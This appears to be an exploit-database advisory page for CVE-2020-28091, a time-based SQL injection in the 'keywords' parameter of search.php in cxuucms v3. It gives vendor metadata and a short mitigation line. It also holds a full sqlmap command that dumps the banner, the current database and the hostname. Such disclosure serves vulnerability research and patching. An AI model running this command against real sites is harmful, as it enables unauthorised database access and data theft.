header-logo
Suggest Exploit
vendor:
cxuucms
by:
icekam
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: cxuucms
Affected Version From: cxuucms - v3
Affected Version To: cxuucms - v3
Patch Exists: YES
Related CWE: CVE-2020-28091
CPE: a:cxuu:cxuucms:3
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2020

xuucms 3 – ‘keywords’ SQL Injection

SQL injection exists in search.php. An attacker can use SQLMAP authentication to exploit the vulnerability. For details, please refer to: https://github.com/cbkhwx/cxuucmsv3/issues/1

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: xuucms 3 - 'keywords' SQL Injection
# Date: 2020-11-18
# Exploit Author: icekam
# Vendor Homepage: https://www.cxuu.top/
# Software Link: https://github.com/cbkhwx/cxuucmsv3
# Version: cxuucms - v3
# CVE : CVE-2020-28091

SQL injection exists in search.php. For details, please refer to:
https://github.com/cbkhwx/cxuucmsv3/issues/1

Use SQLMAP authentication:
 sqlmap -u 'http://localhost/search.php?keywords=12345678'
--dbms='MySQL' --level=3 --risk=3 --technique=T --time-sec=3 -o
--batch --user-agent='Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121
Safari/537.36' -b  --current-db --hostname